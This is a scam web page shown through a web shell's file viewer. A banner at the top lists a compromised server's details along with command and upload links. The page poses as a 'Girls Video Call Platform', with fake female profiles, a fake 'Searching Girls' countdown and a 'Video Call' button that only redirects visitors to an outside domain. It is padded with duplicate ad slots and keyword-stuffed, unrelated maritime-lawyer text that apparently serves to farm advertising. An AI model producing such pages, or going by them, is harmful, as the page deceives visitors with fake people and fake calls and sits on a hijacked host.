MMCT TEAM
Server IP : 2a02:4780:11:1373:0:3017:be17:10  /  Your IP : 216.73.216.55
Web Server : LiteSpeed
System : Linux in-mum-web1273.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64
User : u806862359 ( 806862359)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u806862359/domains/../public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u806862359/domains/../public_html/videocall
<!DOCTYPE html>
<html lang="en">
<head>

<script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js" crossorigin="anonymous"></script>
<script>
  window.googletag = window.googletag || {cmd: []};
  googletag.cmd.push(function() {
    googletag.defineSlot('/23313321986/ads1', [[250, 250], [336, 280], [300, 250], [320, 100]], 'div-gpt-ad-1763359916634-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.enableServices();
  });
</script>
<!-- /23313321986/ads1 -->
<div id='div-gpt-ad-1763359916634-0' style='min-width: 250px; min-height: 100px;'>
  <script>
    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1763359916634-0'); });
  </script>
</div>


<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Girls Video Call Platform</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
}
body {
background: linear-gradient(135deg, #ff69b4 0%, #ff1493 100%);
color: #333;
min-height: 100vh;
padding-bottom: 20px;
position: relative;
}
.container {
max-width: 1200px;
margin: 0 auto;
padding: 0 15px;
}
/* Main Content */
.main-content {
display: flex;
flex-direction: column;
align-items: center;
padding: 20px 0;
}
/* Profile Card */
.profile-card {
background: white;
border-radius: 15px;
padding: 25px;
text-align: center;
box-shadow: 0 10px 30px rgba(0, 0, 0, 0.15);
width: 100%;
max-width: 400px;
margin: 20px 0;
position: relative;
overflow: hidden;
transition: transform 0.3s ease;
}
.profile-card:hover {
transform: translateY(-5px);
}
.profile-pic {
width: 180px;
height: 180px;
border-radius: 50%;
object-fit: cover;
border: 5px solid #ff69b4;
margin: 0 auto 15px;
box-shadow: 0 5px 15px rgba(0, 0, 0, 0.1);
}
.profile-name {
font-size: 28px;
color: #ff1493;
margin-bottom: 5px;
}
.profile-details {
font-size: 16px;
color: #666;
margin-bottom: 10px;
}
.profile-bio {
font-size: 14px;
color: #888;
margin: 15px 0;
padding: 0 10px;
line-height: 1.5;
}
/* Buttons */
.buttons {
display: flex;
justify-content: space-between;
margin: 20px 0;
width: 100%;
}
.button {
padding: 12px 25px;
border: none;
border-radius: 50px;
cursor: pointer;
font-size: 16px;
font-weight: 600;
transition: all 0.3s ease;
width: 48%;
box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
}
.video-call {
background: linear-gradient(to right, #4caf50, #2e7d32);
color: white;
}
.video-call:hover {
background: linear-gradient(to right, #2e7d32, #1b5e20);
transform: translateY(-2px);
}
.next {
background: linear-gradient(to right, #ff69b4, #ff1493);
color: white;
}
.next:hover {
background: linear-gradient(to right, #ff1493, #d81b60);
transform: translateY(-2px);
}
/* Searching Indicator */
.searching {
background: #ff1493;
color: white;
padding: 12px 20px;
border-radius: 50px;
display: none;
margin: 20px 0;
width: 100%;
text-align: center;
font-weight: 500;
box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
}
/* Warnings */
.warnings {
display: flex;
flex-wrap: wrap;
justify-content: space-between;
margin: 25px 0;
gap: 10px;
}
.warning {
background-color: #fff9c4;
padding: 15px;
border-radius: 10px;
width: 100%;
margin-bottom: 10px;
text-align: left;
box-shadow: 0 4px 8px rgba(0, 0, 0, 0.05);
}
.warning.red {
border-left: 4px solid #f44336;
}
.warning.green {
border-left: 4px solid #4caf50;
}
/* About Section */
.about {
background: white;
border-radius: 15px;
padding: 25px;
margin: 20px 0;
box-shadow: 0 10px 30px rgba(0, 0, 0, 0.1);
}
.about h2 {
color: #ff1493;
margin-bottom: 15px;
font-size: 24px;
}
.about p {
line-height: 1.6;
margin-bottom: 15px;
color: #555;
}
/* Responsive Design */
@media (min-width: 768px) {
.warnings {
flex-wrap: nowrap;
}
.warning {
width: 32%;
}
}
@media (max-width: 600px) {
.profile-pic {
width: 150px;
height: 150px;
}
.button {
padding: 10px 15px;
font-size: 14px;
}
}
</style>
</head>
<body>
<div class="container">
<div class="main-content">
<!-- Profile Card -->
<div class="profile-card">
<img id="profilePic" class="profile-pic" src="" alt="Profile Picture">
<div class="profile-info">
<h2 id="profileName" class="profile-name"></h2>
<p id="profileDetails" class="profile-details"></p>
<p id="profileBio" class="profile-bio"></p>
</div>
<div class="buttons">
<button class="button video-call" onclick="videoCall()">Video Call</button>
<button class="button next" onclick="nextProfile()">Next</button>
</div>
<div id="searching" class="searching">Searching Girls... Wait</div>
<div class="warnings">
<div class="warning red">✖ Don't Spam<br>Avoid sending repeated or irrelevant messages.</div>
<div class="warning green">✔ Report Issues<br>Let us know if someone violates the rules.</div>
<div class="warning red">✖ Don't Share Private Info<br>Never disclose your address, bank info, or passwords.</div>
</div>
</div>
<!-- Article Section -->
<div class="article-section">
<script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js" crossorigin="anonymous"></script>
<script>
  window.googletag = window.googletag || {cmd: []};
  googletag.cmd.push(function() {
    googletag.defineSlot('/23313321986/ads1', [[250, 250], [336, 280], [300, 250], [320, 100]], 'div-gpt-ad-1763359916634-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.enableServices();
  });
</script>
<!-- /23313321986/ads1 -->
<div id='div-gpt-ad-1763359916634-0' style='min-width: 250px; min-height: 100px;'>
  <script>
    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1763359916634-0'); });
  </script>
</div>
<h2>Houston Maritime Attorney – Protecting Your Rights at Sea</h2>
<p>When it comes to accidents and injuries that happen on the water, having an experienced <strong>Houston maritime attorney</strong> by your side can make all the difference. Maritime law, also known as admiralty law, covers cases involving offshore injuries, ship accidents, oil rig explosions, and other incidents that occur at sea. If you are a seaman, dock worker, or offshore employee, you deserve strong legal representation to fight for your rights under federal and state laws.</p>
<h2>Why You Need a Maritime Lawyer in Houston</h2>
<p>Houston is home to one of the busiest ports in the United States, which means maritime accidents are unfortunately common. A skilled <strong>Houston maritime lawyer</strong> understands the complexities of cases involving shipping companies, offshore drilling operations, and vessel owners. With the help of an experienced <strong>offshore injury lawyer in Houston</strong>, you can pursue compensation for lost wages, medical bills, and pain and suffering caused by unsafe working conditions or negligence.</p>
<h2>The Jones Act and Seamen’s Rights</h2>
<p>One of the most important protections for injured maritime workers is the <strong>Jones Act</strong>. This federal law allows seamen who are injured due to negligence to file a claim against their employer. A knowledgeable <strong>Jones Act attorney in Houston</strong> can guide you through the legal process, ensuring that your rights are fully protected. From proving negligence to maximizing your compensation, your lawyer will be your strongest advocate.</p>
<h2>Types of Maritime Cases We Handle</h2>
<p>Our legal team has experience in a wide range of maritime and admiralty cases, including:</p>
<ul>
<script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js" crossorigin="anonymous"></script>
<script>
  window.googletag = window.googletag || {cmd: []};
  googletag.cmd.push(function() {
    googletag.defineSlot('/23313321986/ads2', [[320, 100], [300, 250], [250, 250], [336, 280]], 'div-gpt-ad-1763360264285-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.enableServices();
  });
</script>
<!-- /23313321986/ads2 -->
<div id='div-gpt-ad-1763360264285-0' style='min-width: 250px; min-height: 100px;'>
  <script>
    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1763360264285-0'); });
  </script>
</div>
<li>Offshore oil rig accidents</li>
<li>Cargo ship and vessel injuries</li>
<li>Dock and harbor worker claims</li>
<li>Crane accidents and equipment failures</li>
<li>Wrongful death at sea</li>
<li>Jones Act and maintenance & cure claims</li>
</ul>
<script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js" crossorigin="anonymous"></script>
<script>
  window.googletag = window.googletag || {cmd: []};
  googletag.cmd.push(function() {
    googletag.defineSlot('/23313321986/ads2', [[320, 100], [300, 250], [250, 250], [336, 280]], 'div-gpt-ad-1763360264285-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.enableServices();
  });
</script>
<!-- /23313321986/ads2 -->
<div id='div-gpt-ad-1763360264285-0' style='min-width: 250px; min-height: 100px;'>
  <script>
    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1763360264285-0'); });
  </script>
</div>
<h2>Why Choose Our Houston Maritime Law Firm</h2>
<p>Choosing the right <strong>maritime law firm in Houston</strong> is critical to the success of your case. Our attorneys have decades of experience handling complex maritime injury claims and fighting against powerful corporations and insurance companies. We provide aggressive representation and personalized legal strategies to help you recover the compensation you deserve.</p>
<h2>Contact a Houston Maritime Lawyer Today</h2>
<p>If you or a loved one has been injured at sea, don’t wait to seek legal help. Contact our dedicated <strong>Houston maritime attorneys</strong> today for a free consultation. We are available 24/7 to answer your questions and guide you through the legal process. Let us protect your rights and help you secure the justice and compensation you deserve.</p>
</div>
</div>
</div>
<script>
// Profile images array (using your images)
const profileImages = [
"https://webbloggin.online/wp-content/uploads/2025/09/image2.webp",
"https://webbloggin.online/wp-content/uploads/2025/09/image10.webp",
"https://webbloggin.online/wp-content/uploads/2025/09/image9.webp",
"https://webbloggin.online/wp-content/uploads/2025/09/image8.webp",
"https://webbloggin.online/wp-content/uploads/2025/09/image7.webp",
"https://webbloggin.online/wp-content/uploads/2025/09/image6.webp",
"https://webbloggin.online/wp-content/uploads/2025/09/image5.webp",
"https://webbloggin.online/wp-content/uploads/2025/09/image4.webp",
"https://webbloggin.online/wp-content/uploads/2025/09/image3.webp"
];
// Sample profiles data
const profiles = [
{
name: 'Anna',
age: 24,
location: 'New York',
bio: 'Loves traveling and photography. Looking to meet new friends from around the world!'
},
{
name: 'Sophia',
age: 22,
location: 'Los Angeles',
bio: 'Fashion enthusiast and model. Always up for a good conversation!'
},
{
name: 'Emma',
age: 25,
location: 'Chicago',
bio: 'Professional dancer and fitness trainer. Let\'s talk about healthy living!'
},
{
name: 'Olivia',
age: 23,
location: 'Miami',
bio: 'Beach lover and surf instructor. Passionate about ocean conservation.'
},
{
name: 'Isabella',
age: 26,
location: 'London',
bio: 'Art student and painter. I believe every person has a story worth hearing.'
},
{
name: 'Mia',
age: 21,
location: 'Paris',
bio: 'Chef and food blogger. Love trying new recipes from different cultures!'
},
{
name: 'Charlotte',
age: 24,
location: 'Tokyo',
bio: 'Anime fan and cosplayer. Let\'s talk about Japanese culture!'
},
{
name: 'Amelia',
age: 25,
location: 'Sydney',
bio: 'Marine biologist and diver. Passionate about protecting marine life.'
},
{
name: 'Harper',
age: 23,
location: 'Toronto',
bio: 'Music producer and DJ. Always looking for new sounds and collaborations.'
}
];
let currentProfileIndex = 0;
const searchingDiv = document.getElementById('searching');
function loadProfile(index) {
const profile = profiles[index];
document.getElementById('profilePic').src = profileImages[index];
document.getElementById('profileName').textContent = profile.name;
document.getElementById('profileDetails').textContent = `Age: ${profile.age} | Location: ${profile.location}`;
document.getElementById('profileBio').textContent = profile.bio;
}
function nextProfile() {
searchingDiv.style.display = 'block';
searchingDiv.textContent = 'Searching Girls... Wait';
let countdown = 3;
const interval = setInterval(() => {
countdown--;
searchingDiv.textContent = `Searching Girls... Wait (${countdown})`;
if (countdown === 0) {
clearInterval(interval);
searchingDiv.style.display = 'none';
// Redirect to the specified URL
window.location.href = "https://dgmamcgadag.org.in/2";
}
}, 1000);
}
function videoCall() {
searchingDiv.style.display = 'block';
searchingDiv.textContent = 'Connecting... Wait';
let countdown = 5;
const interval = setInterval(() => {
countdown--;
searchingDiv.textContent = `Connecting... Wait (${countdown})`;
if (countdown === 0) {
clearInterval(interval);
searchingDiv.style.display = 'none';
// Redirect to video call link
window.location.href = "https://dgmamcgadag.org.in/1";
}
}, 1000);
}
// Initial load
loadProfile(currentProfileIndex);
</script>
</body>
</html>

MMCT - 2023